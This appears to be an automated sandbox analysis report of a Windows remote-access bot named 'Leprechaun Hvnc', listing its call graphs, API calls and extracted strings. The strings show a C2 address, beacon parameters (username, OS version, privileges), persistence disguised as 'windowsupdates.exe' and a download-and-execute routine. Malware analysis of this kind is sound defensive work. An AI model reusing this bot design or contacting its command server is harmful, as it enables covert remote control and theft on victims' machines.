GetStdHandle WriteConsoleA GetProcessHeap HeapAlloc 828->830 831 49392d lstrcmpA 828->831 829->819 892 491000 830->892 831->833 834 49393a GetStdHandle WriteConsoleA 831->834 832 4936d0 lstrcmpA 832->833 833->822 833->823 833->824 833->825 833->827 833->828 833->832 836 493710 lstrcmpA 833->836 842 4937c2 lstrcmpA 833->842 834->833 836->833 838 49388f lstrcatA lstrcatA lstrcatA 840 491000 2 API calls 838->840 839 4939e7 841 4938bd 840->841 843 4938cc GetStdHandle WriteConsoleA 841->843 896 491120 GetProcessHeap HeapAlloc 841->896 842->833 843->826 845 4938f3 GetProcessHeap HeapAlloc lstrcpyW lstrcatW lstrcatW 845->825 846->808 847->808 849 49166b 848->849 850 49165c RegCloseKey 848->850 849->812 850->812 852 4912f2 lstrcpyW 851->852 901 491680 LoadLibraryW 852->901 855 49130a 13 API calls 856 491ab0 4 API calls 855->856 857 49138d 856->857 858 4919d0 10 API calls 857->858 859 491393 GetProcessHeap HeapAlloc 858->859 860 4913d0 RegCreateKeyW 859->860 861 4913b6 859->861 862 491628 860->862 863 4913ec RegSetKeyValueA 860->863 861->860 862->812 863->862 865 491419 GetProcessHeap HeapAlloc GetModuleFileNameA lstrcmpW 863->865 866 491458 GetProcessHeap HeapAlloc GetEnvironmentVariableA 865->866 867 4914e8 GetProcessHeap HeapAlloc 865->867 866->867 868 49147b lstrcatA CreateDirectoryA lstrcatA CopyFileA RegCreateKeyW 866->868 871 491607 GetProcessHeap HeapFree 867->871 873 49151b 867->873 868->867 869 4914be RegSetKeyValueA 868->869 869->862 869->867 871->812 873->871 873->873 875 491239 RegQueryValueExW 874->875 876 49120e GetStdHandle 874->876 878 491268 GetStdHandle 875->878 879 49127f RegCloseKey 875->879 877 491223 WriteConsoleW RegCloseKey 876->877 877->812 878->877 879->812 881 491ae8 lstrcmpW 880->881 882 491b2e 880->882 883 491af8 HttpSendRequestW 881->883 884 491afc lstrcmpW 881->884 882->808 883->808 884->882 884->883 887 491a9b HeapAlloc 886->887 888 491a2e 886->888 887->822 887->833 888->887 889 491a37 GetProcessHeap HeapReAlloc 888->889 890 491a81 InternetReadFile 888->890 891 491a7e 888->891 889->888 889->890 890->887 890->888 891->890 893 491011 892->893 893->893 894 491018 GetProcessHeap HeapAlloc 893->894 895 49103f lstrcpyW GetProcessHeap HeapAlloc GetEnvironmentVariableA 894->895 895->838 895->839 897 491142 GetStdHandle WriteConsoleA 896->897 898 491166 GetProcessHeap HeapAlloc 896->898 897->845 899 491178 GetProcessHeap HeapFree GetStdHandle WriteConsoleA 898->899 900 4911a7 CreateProcessA GetProcessHeap HeapFree GetProcessHeap HeapFree 898->900 899->845 900->845 902 49169d GetProcAddress 901->902 903 491986 901->903 902->903 904 4916b3 GetProcessHeap HeapAlloc 902->904 903->855 905 4916d5 904->905 905->905 906 4916f3 GetProcessHeap HeapAlloc VerSetConditionMask VerifyVersionInfoW 905->906 907 49176c 906->907 908 491895 906->908 911 4917b1 907->911 912 491771 907->912 909 49189a 908->909 910 4918d6 908->910 915 4918b9 909->915 916 4918a5 lstrcpyW 909->916 917 4918db 910->917 918 491944 910->918 913 49180f 911->913 914 4917b6 911->914 919 49197e 912->919 925 491789 lstrcpyW 912->925 926 49179d lstrcpyW 912->926 913->919 933 491840 lstrcpyW 913->933 939 491854 913->939 920 4917c0 lstrcpyW 914->920 921 4917d4 914->921 915->919 922 4918c2 lstrcpyW 915->922 916->855 923 4918f9 917->923 924 4918e5 lstrcpyW 917->924 918->919 931 49195e lstrcpyW 918->931 932 491972 lstrcpyW 918->932 919->855 920->855 927 4917d9 lstrcpyW 921->927 928 4917ed 921->928 922->855 929 4918fe lstrcpyW 923->929 930 491912 923->930 924->855 925->855 926->855 927->855 928->933 934 4917f2 928->934 929->855 935 49192b 930->935 936 491917 lstrcpyW 930->936 931->855 932->919 933->855 934->919 938 4917fb lstrcpyW 934->938 935->919 937 491930 lstrcpyW 935->937 936->855 937->855 938->855 940 491876 939->940 941 491881 lstrcpyW 939->941 942 491862 lstrcpyW 939->942 940->919 940->941 941->855 942->855

Callgraph

Hide Legend
  • Executed
  • Not Executed
  • Opacity -> Relevance
  • Disassembly available
callgraph 0 Function_00491640 1 Function_00491B40 2 Function_00491680 3 Function_00491000 4 Function_004919D0 5 Function_00492E50 5->5 10 Function_00492810 5->10 16 Function_00492BE0 5->16 25 Function_004931B0 5->25 26 Function_004929B0 5->26 6 Function_00493150 7 Function_00491990 8 Function_00492790 9 Function_00492410 9->1 9->9 15 Function_00492160 9->15 22 Function_00491EF0 9->22 9->25 11 Function_0049272D 12 Function_00491E6E 13 Function_004929AE 14 Function_004933E0 14->0 14->3 14->4 14->5 14->7 14->9 17 Function_004912A0 14->17 18 Function_00491120 14->18 21 Function_004911F0 14->21 23 Function_00491AB0 14->23 24 Function_004919B0 14->24 14->25 15->8 16->8 17->2 17->4 17->23 19 Function_004933BE 20 Function_004923B1 22->9 22->15 22->25 26->5 26->16 26->25

Executed Functions

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 99 4912a0-4912f0 GetProcessHeap HeapAlloc GetUserNameW GetProcessHeap HeapAlloc IsUserAnAdmin 100 4912f9 99->100 101 4912f2-4912f7 99->101 102 4912fe-4913b4 lstrcpyW call 491680 lstrlenW * 3 GetProcessHeap HeapAlloc lstrcpyW lstrcatW * 7 call 491ab0 call 4919d0 GetProcessHeap HeapAlloc 100->102 101->102 109 4913d0-4913e6 RegCreateKeyW 102->109 110 4913b6-4913b8 102->110 112 491628-491630 109->112 113 4913ec-4913ee 109->113 110->109 111 4913ba-4913bc 110->111 111->109 114 4913be-4913c0 111->114 115 4913f1-4913f6 113->115 116 4913c2-4913ce 114->116 115->115 117 4913f8-491413 RegSetKeyValueA 115->117 116->109 116->116 117->112 118 491419-491452 GetProcessHeap HeapAlloc GetModuleFileNameA lstrcmpW 117->118 119 491458-491479 GetProcessHeap HeapAlloc GetEnvironmentVariableA 118->119 120 4914ee-4914f0 118->120 121 4914e8 119->121 122 49147b-4914bc lstrcatA CreateDirectoryA lstrcatA CopyFileA RegCreateKeyW 119->122 123 4914f3-4914f8 120->123 121->120 122->121 124 4914be-4914c0 122->124 123->123 125 4914fa-491515 GetProcessHeap HeapAlloc 123->125 126 4914c3-4914c8 124->126 127 49151b-49151f 125->127 128 491607-491627 GetProcessHeap HeapFree 125->128 126->126 129 4914ca-4914e2 RegSetKeyValueA 126->129 130 4915fe-491603 127->130 131 491525-491528 127->131 129->112 129->121 130->128 132 49152e-49153b 131->132 133 4915f0-4915fc 131->133 134 49153d-49153f 132->134 135 491545-491548 132->135 133->130 133->133 134->133 134->135 136 4915bf-4915c8 135->136 137 49154e-491560 135->137 138 4915d0-4915e8 136->138 139 491563-4915b7 137->139 138->138 140 4915ea-4915ec 138->140 139->139 141 4915b9-4915bd 139->141 140->130 142 4915ee 140->142 141->136 141->140 142->133
APIs
  • GetProcessHeap.KERNEL32(00000008,00000104,77355E70,76231700,7622F380,?,?,00493503,0049500C), ref: 004912B6
  • HeapAlloc.KERNEL32(00000000,?,?,00493503,0049500C), ref: 004912BF
  • GetUserNameW.ADVAPI32(00000000,?), ref: 004912D0
  • GetProcessHeap.KERNEL32(00000008,00000104), ref: 004912DD
  • HeapAlloc.KERNEL32(00000000), ref: 004912E0
  • IsUserAnAdmin.SHELL32 ref: 004912E7
  • lstrcpyW.KERNEL32(00000000,User), ref: 004912FF
  • lstrlenW.KERNEL32(00000000), ref: 00491313
  • lstrlenW.KERNEL32(00000000), ref: 00491318
  • lstrlenW.KERNEL32(00493503), ref: 0049131F
  • GetProcessHeap.KERNEL32 ref: 00491329
  • HeapAlloc.KERNEL32(00000000,00000008,-00000104), ref: 00491333
  • lstrcpyW.KERNEL32(00000000,/c2.php), ref: 00491341
  • lstrcatW.KERNEL32(00000000,?action=installnewbot), ref: 00491353
  • lstrcatW.KERNEL32(00000000,&Username=), ref: 0049135B
  • lstrcatW.KERNEL32(00000000,00493503), ref: 00491361
  • lstrcatW.KERNEL32(00000000,&OsVersion=), ref: 00491369
  • lstrcatW.KERNEL32(00000000,00000000), ref: 0049136D
  • lstrcatW.KERNEL32(00000000,&Privileges=), ref: 00491375
  • lstrcatW.KERNEL32(00000000,?), ref: 0049137B
  • GetProcessHeap.KERNEL32 ref: 0049139B
  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 004913A5
  • RegCreateKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,0049500C), ref: 004913DE
  • RegSetKeyValueA.KERNELBASE(0049500C,00000000,00494454,00000001,00000000,00000000), ref: 0049140B
  • GetProcessHeap.KERNEL32(00000008,00000104), ref: 00491426
  • HeapAlloc.KERNEL32(00000000), ref: 0049142F
  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0049143C
  • lstrcmpW.KERNEL32(User,?), ref: 0049144A
  • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0049145F
  • HeapAlloc.KERNEL32(00000000), ref: 00491462
  • GetEnvironmentVariableA.KERNEL32(userprofile,00000000,00000104), ref: 00491471
  • lstrcatA.KERNEL32(00000000,\Documents\WindowsecurityUpdates\), ref: 00491487
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0049148C
  • lstrcatA.KERNEL32(00000000,windowsupdates.exe), ref: 00491498
  • CopyFileA.KERNEL32(00000104,00000000,00000001), ref: 004914A0
  • RegCreateKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,0049500C), ref: 004914B4
  • RegSetKeyValueA.ADVAPI32(0049500C,00000000,windowsupdates,00000001,00000000,00000001), ref: 004914DA
  • GetProcessHeap.KERNEL32(00000008,-00000002), ref: 00491508
  • HeapAlloc.KERNEL32(00000000), ref: 0049150F
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0049160F
  • HeapFree.KERNEL32(00000000), ref: 00491616
Strings
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: Heap$lstrcat$Process$Alloc$Createlstrlen$FileNameUserValuelstrcpy$AdminCopyDirectoryEnvironmentFreeModuleVariablelstrcmp
  • String ID: &OsVersion=$&Privileges=$&Username=$/c2.php$?action=installnewbot$Admin$GET$Software\LeprechaunHvnc$User$\Documents\WindowsecurityUpdates\$userprofile$windowsupdates$windowsupdates.exe
  • API String ID: 878550954-16938495
  • Opcode ID: 318429957e130d49581be5d97a6d9e70c221f96f17f087bd11aaf514644185b1
  • Instruction ID: 032519ac1669b8fef6846de509b35a9c84f8fd63c7bae39a18be6a44fe486ed1
  • Opcode Fuzzy Hash: 318429957e130d49581be5d97a6d9e70c221f96f17f087bd11aaf514644185b1
  • Instruction Fuzzy Hash: 22A12531A00212ABDF205BB4DC48FAE7F78EFD6714F05417AF605A7250EB759842CB58

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 149 4919d0-491a2c GetProcessHeap HeapAlloc GetProcessHeap RtlAllocateHeap GetProcessHeap HeapAlloc InternetReadFile 150 491a9b-491aa3 149->150 151 491a2e 149->151 152 491a30-491a35 151->152 152->150 153 491a37-491a5a GetProcessHeap HeapReAlloc 152->153 154 491a5c-491a5e 153->154 155 491a81-491a99 InternetReadFile 153->155 154->155 156 491a60-491a62 154->156 155->150 155->152 156->155 157 491a64-491a68 156->157 158 491a70-491a7c 157->158 158->158 159 491a7e 158->159 159->155
APIs
  • GetProcessHeap.KERNEL32(00000008,00000008,77355E70,00000000,7622F380,00493586,00000000), ref: 004919E3
  • HeapAlloc.KERNEL32(00000000), ref: 004919EC
  • GetProcessHeap.KERNEL32(00000008,00000800), ref: 004919F7
  • RtlAllocateHeap.NTDLL(00000000), ref: 004919FA
  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00491A05
  • HeapAlloc.KERNEL32(00000000), ref: 00491A0C
  • InternetReadFile.WININET(00000800,00000000,00000800,?), ref: 00491A24
  • GetProcessHeap.KERNEL32 ref: 00491A3E
  • HeapReAlloc.KERNEL32(00000000,00000008,77355E70,?), ref: 00491A49
  • InternetReadFile.WININET(00000800,?,00000800,?), ref: 00491A91
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: Heap$Process$Alloc$FileInternetRead$Allocate
  • String ID:
  • API String ID: 1723587032-0
  • Opcode ID: a82b47ae2f76702c1a1e4b080b7c8670a8df5c57b5a80c2472aea1f5d2c462fb
  • Instruction ID: a478f7ee9d7221271b1d1f7bdcf199dd81a03ec2730d8442b64d18761c9093c3
  • Opcode Fuzzy Hash: a82b47ae2f76702c1a1e4b080b7c8670a8df5c57b5a80c2472aea1f5d2c462fb
  • Instruction Fuzzy Hash: 4921E731A01204ABDF209FA4DD48F5B7FB8FF91750F1880B6EA049B254CA30EC058B94

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 0 4933e0-4933f3 LoadLibraryW 1 493418-49342b GetProcAddress 0->1 2 4933f5-493417 GetStdHandle WriteConsoleW 0->2 3 49342d-49344f GetStdHandle WriteConsoleW 1->3 4 493450-49346a CreateMutexA GetLastError 1->4 5 49346c-493471 4->5 6 493472-493475 4->6 7 49347b 6->7 8 493481 7->8 9 493487-49348e call 4919b0 8->9 12 493490-4934a7 call 491990 9->12 12->9 15 4934a9-4934d9 GetStdHandle WriteConsoleW GetProcessHeap HeapAlloc call 491640 12->15 18 493508-49350d call 4911f0 15->18 19 4934db-4934fe GetStdHandle WriteConsoleW call 4912a0 15->19 23 493512-493517 18->23 22 493503-493506 19->22 24 49351d-493563 GetProcessHeap HeapAlloc lstrcpyW lstrcatW * 2 call 491ab0 22->24 23->24 25 4939f1-4939fc 23->25 27 493568-493578 24->27 27->8 28 49357e 27->28 29 493580-4935a3 call 4919d0 HeapAlloc 28->29 32 4935bf-4935e3 GetStdHandle WriteConsoleW GetStdHandle 29->32 33 4935a5-4935a7 29->33 35 4935e6-4935eb 32->35 33->32 34 4935a9-4935ab 33->34 34->32 36 4935ad-4935af 34->36 35->35 37 4935ed-49361e WriteConsoleA GetStdHandle WriteConsoleW 35->37 38 4935b1-4935bd 36->38 39 49368b-49368d 37->39 40 493620-49366a call 492410 37->40 38->32 38->38 41 49368f 39->41 40->39 45 49366c-49367e call 4931b0 40->45 44 493691-4936af lstrcmpA 41->44 46 4936b5-4936b7 44->46 47 493956 44->47 57 49372f-493749 GetProcessHeap HeapAlloc 45->57 58 493684 45->58 50 4937f8-4937fd 46->50 51 4936bd-4936c0 46->51 49 49395c-49397b GetProcessHeap HeapFree GetProcessHeap HeapFree Sleep 47->49 54 493981-4939dc GetProcessHeap HeapAlloc lstrcpyW lstrcatW * 2 call 491ab0 49->54 53 493800 50->53 55 4936ea 51->55 56 4936c2-4936c8 51->56 59 493802-493812 lstrcmpA 53->59 54->29 74 4939e2 54->74 62 4936ef-4936f8 55->62 56->55 61 4936ca 56->61 57->39 64 49374f-493774 57->64 58->39 65 493818-493889 GetStdHandle WriteConsoleA GetProcessHeap HeapAlloc call 491000 lstrcpyW GetProcessHeap HeapAlloc GetEnvironmentVariableA 59->65 66 49392d-493938 lstrcmpA 59->66 68 4936d0-4936dd lstrcmpA 61->68 62->53 63 4936fe-493704 62->63 63->53 69 49370a 63->69 71 493796 64->71 72 493776-493794 64->72 82 49388f-4938ca lstrcatA * 3 call 491000 65->82 83 4939e7-4939f0 65->83 66->47 70 49393a-493950 GetStdHandle WriteConsoleA 66->70 75 4937e9-4937ee 68->75 76 4936e3-4936e8 68->76 77 493710-49371d lstrcmpA 69->77 70->47 78 493799-4937b0 call 492e50 71->78 72->78 74->7 75->62 76->55 76->68 80 4937f3-4937f6 77->80 81 493723-493728 77->81 78->41 89 4937b6-4937bc 78->89 80->59 81->77 85 49372a 81->85 94 4938ed-49392b call 491120 GetProcessHeap HeapAlloc lstrcpyW lstrcatW * 2 82->94 95 4938cc-4938e8 GetStdHandle WriteConsoleA 82->95 85->53 89->41 90 4937c2-4937d3 lstrcmpA 89->90 92 4937e1-4937e4 90->92 93 4937d5-4937da 90->93 92->44 93->90 96 4937dc 93->96 94->49 95->54 96->41
APIs
  • LoadLibraryW.KERNELBASE(Urlmon.dll), ref: 004933EB
  • GetStdHandle.KERNEL32(000000F5), ref: 004933F7
  • WriteConsoleW.KERNEL32(00000000,Faild to load library Urlmondll ,00000021,?,00000000), ref: 0049340B
  • GetProcAddress.KERNEL32(00000000,URLDownloadToFileW), ref: 0049341E
  • GetStdHandle.KERNEL32(000000F5), ref: 0049342F
  • WriteConsoleW.KERNEL32(00000000,Faild to get function address pURLDownloadToFile ,00000032,?,00000000), ref: 00493443
Strings
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: ConsoleHandleWrite$AddressLibraryLoadProc
  • String ID: .exe$/c2.php$65.20.106.109$?action=fetchcommand&botid=$?action=updatecommand&status=finished&botid=$Faild to download the file$Faild to get function address pURLDownloadToFile $Faild to load library Urlmondll $GET$HVNC start detectd$HVNC stop detectd$LeprechaunHvnc$URLDownloadToFileW$Urlmon.dll$[-] Connecting ... $[-] bot is not installed ... $disabled$enabled$hvnc$response : $task_command$task_name$task_status$temp
  • API String ID: 3712223375-459877428
  • Opcode ID: 44eb854aef874be949c697a41801b202760e45f6a4996b839f16e51c38ce07d6
  • Instruction ID: e6c4374e9a918cd40c222889cf93ff498b8b9ce941a251bca76b7030492ca887
  • Opcode Fuzzy Hash: 44eb854aef874be949c697a41801b202760e45f6a4996b839f16e51c38ce07d6
  • Instruction Fuzzy Hash: D302D371A40204ABDF209FA4DC45F6A7FB8FF99715F10413AFA11A7290D778AD02CB69

Control-flow Graph

APIs
  • RegOpenKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,0049500C), ref: 00491204
  • GetStdHandle.KERNEL32(000000F5,?,?,00493512,0049500C), ref: 00491210
  • WriteConsoleW.KERNEL32(00000000,Faild to Query key value ,0000001C,?,00000000), ref: 00491224
  • RegCloseKey.ADVAPI32(0049500C), ref: 0049122D
  • RegQueryValueExW.KERNELBASE(0049500C,004944DC,00000000,00000001,00493512,00493512), ref: 0049125E
  • GetStdHandle.KERNEL32(000000F5), ref: 0049126A
  • RegCloseKey.ADVAPI32(0049500C), ref: 00491282
Strings
  • Faild to Query key value , xrefs: 00491278
  • Faild to Open the key , xrefs: 0049121E
  • Software\LeprechaunHvnc, xrefs: 004911FA
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: CloseHandle$ConsoleOpenQueryValueWrite
  • String ID: Faild to Open the key $Faild to Query key value $Software\LeprechaunHvnc
  • API String ID: 1921540652-3088589752
  • Opcode ID: dc2de828a4813b5200bb8fb94588c013ba7b47c004afa38960e84a84fa62e317
  • Instruction ID: 0a8df900fd61a1cef824a7508b40df29b180df5fefeb1de2d3903aff56e650ac
  • Opcode Fuzzy Hash: dc2de828a4813b5200bb8fb94588c013ba7b47c004afa38960e84a84fa62e317
  • Instruction Fuzzy Hash: C0117C31A40208BFEF20DFA0DD0AFAE7B78EB58710F1001B6BB14E11E0D7B59A119B59

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 160 491ab0-491ae6 HttpOpenRequestW 161 491ae8-491af6 lstrcmpW 160->161 162 491b2e-491b35 160->162 163 491af8-491afa 161->163 164 491afc-491b0a lstrcmpW 161->164 165 491b14-491b2d HttpSendRequestW 163->165 164->162 166 491b0c-491b12 164->166 166->165
APIs
  • HttpOpenRequestW.WININET(00494604,00000000,p^5w,00000000,00000000,00000000,00000000,00000000), ref: 00491ADC
  • lstrcmpW.KERNEL32(00000000,GET), ref: 00491AEE
  • lstrcmpW.KERNEL32(00000000,POST), ref: 00491B02
  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,00000000), ref: 00491B19
Strings
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: HttpRequestlstrcmp$OpenSend
  • String ID: GET$POST$p^5w$text/*
  • API String ID: 1698499804-3758742350
  • Opcode ID: 12f6a98860d59b06b31302f5e77482e598e937ca835cf03a518309bf5650675c
  • Instruction ID: a39577706b82475a6c80929caf2b4fb09cae82a166cc67d907f8b7e796c51b56
  • Opcode Fuzzy Hash: 12f6a98860d59b06b31302f5e77482e598e937ca835cf03a518309bf5650675c
  • Instruction Fuzzy Hash: 0801923134020A7BDF215F95EC05F6B7FACEB99B15F100076FE04E6290E674981296A9

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 167 491640-49165a RegOpenKeyW 168 49166b-491673 167->168 169 49165c-49166a RegCloseKey 167->169
APIs
  • RegOpenKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,004934D7), ref: 00491652
  • RegCloseKey.ADVAPI32(004934D7,?,?,004934D7), ref: 0049165F
Strings
  • Software\LeprechaunHvnc, xrefs: 00491648
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: CloseOpen
  • String ID: Software\LeprechaunHvnc
  • API String ID: 47109696-1385647368
  • Opcode ID: ebf5155f76b59a679bb8d37e64101dbf31f68b6082138fb5ff70a420985bfe53
  • Instruction ID: 388e5c589e1417fd2ef05766d5a9c2d1b0e811f65ed005d7aec0b6c741b71d18
  • Opcode Fuzzy Hash: ebf5155f76b59a679bb8d37e64101dbf31f68b6082138fb5ff70a420985bfe53
  • Instruction Fuzzy Hash: 8CD05E3170410CEBDB30CBA0ED05FAA7BACDB95305F1001B6BE0CD1520EA679D2096A9

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 170 4919b0-4919c3 InternetOpenW
APIs
  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36',00000001,00000000,00000000,00000000), ref: 004919BD
Strings
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', xrefs: 004919B8
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: InternetOpen
  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
  • API String ID: 2038078732-2738514536
  • Opcode ID: 4488811413c76176e58f3daa125b5816c98e7cf0c6e17ad2faec772d6b369572
  • Instruction ID: a4f2ea9de029847be208b720be5abefb66646afba170500b1bf0cc8ec5df5162
  • Opcode Fuzzy Hash: 4488811413c76176e58f3daa125b5816c98e7cf0c6e17ad2faec772d6b369572
  • Instruction Fuzzy Hash: FBB00170BE5300B7FD3056E0AD5BF4429115790F16F354062B3057C5D095D52042852D

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 171 491990-4919ad InternetConnectW
APIs
  • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 004919A6
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: ConnectInternet
  • String ID:
  • API String ID: 3050416762-0
  • Opcode ID: c95b4f69310bc3f7523b8e713e6910b6a42dbca427b6f866c694e38b876de6bc
  • Instruction ID: dab9c5c2c8f518668ef89a5c18de9f8657345db212a632c82725e8db7397daf9
  • Opcode Fuzzy Hash: c95b4f69310bc3f7523b8e713e6910b6a42dbca427b6f866c694e38b876de6bc
  • Instruction Fuzzy Hash: B4D00231290308B7EF211E91DC07F953B19A744B51F104011B71C2C1E086B265615648

Non-executed Functions

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 172 491680-491697 LoadLibraryW 173 49169d-4916ad GetProcAddress 172->173 174 491986-49198c 172->174 173->174 175 4916b3-4916d0 GetProcessHeap HeapAlloc 173->175 176 4916d5-4916de 175->176 176->176 177 4916e0-491766 GetProcessHeap HeapAlloc VerSetConditionMask VerifyVersionInfoW 176->177 179 49176c-49176f 177->179 180 491895-491898 177->180 183 4917b1-4917b4 179->183 184 491771-491778 179->184 181 49189a-4918a3 180->181 182 4918d6-4918d9 180->182 187 4918b9-4918bc 181->187 188 4918a5-4918b8 lstrcpyW 181->188 189 4918db-4918e3 182->189 190 491944-491947 182->190 185 49180f-491812 183->185 186 4917b6-4917be 183->186 191 49197e-491985 184->191 192 49177e-491787 184->192 185->191 197 491818-49181f 185->197 193 4917c0-4917d3 lstrcpyW 186->193 194 4917d4-4917d7 186->194 187->191 196 4918c2-4918d5 lstrcpyW 187->196 198 4918f9-4918fc 189->198 199 4918e5-4918f8 lstrcpyW 189->199 190->191 195 491949-491950 190->195 200 491789-49179c lstrcpyW 192->200 201 49179d-4917b0 lstrcpyW 192->201 203 4917d9-4917ec lstrcpyW 194->203 204 4917ed-4917f0 194->204 195->191 202 491952-49195c 195->202 197->191 205 491825-491830 197->205 206 4918fe-491911 lstrcpyW 198->206 207 491912-491915 198->207 208 49195e-491971 lstrcpyW 202->208 209 491972-491978 lstrcpyW 202->209 210 491840-491853 lstrcpyW 204->210 211 4917f2-4917f5 204->211 212 491832-491837 205->212 213 491854-491859 205->213 214 49192b-49192e 207->214 215 491917-49192a lstrcpyW 207->215 209->191 211->191 217 4917fb-49180e lstrcpyW 211->217 218 491839-49183e 212->218 219 49185b-491860 212->219 213->219 220 491876-49187b 213->220 214->191 216 491930-491943 lstrcpyW 214->216 218->210 218->213 221 491881-491894 lstrcpyW 219->221 222 491862-491875 lstrcpyW 219->222 220->191 220->221
APIs
  • LoadLibraryW.KERNEL32(ntdll.dll,00000000), ref: 0049168F
  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004916A3
  • GetProcessHeap.KERNEL32(00000008,00000104,77355E70), ref: 004916BB
  • HeapAlloc.KERNEL32(00000000), ref: 004916C2
  • GetProcessHeap.KERNEL32(00000008,0000011C), ref: 004916FA
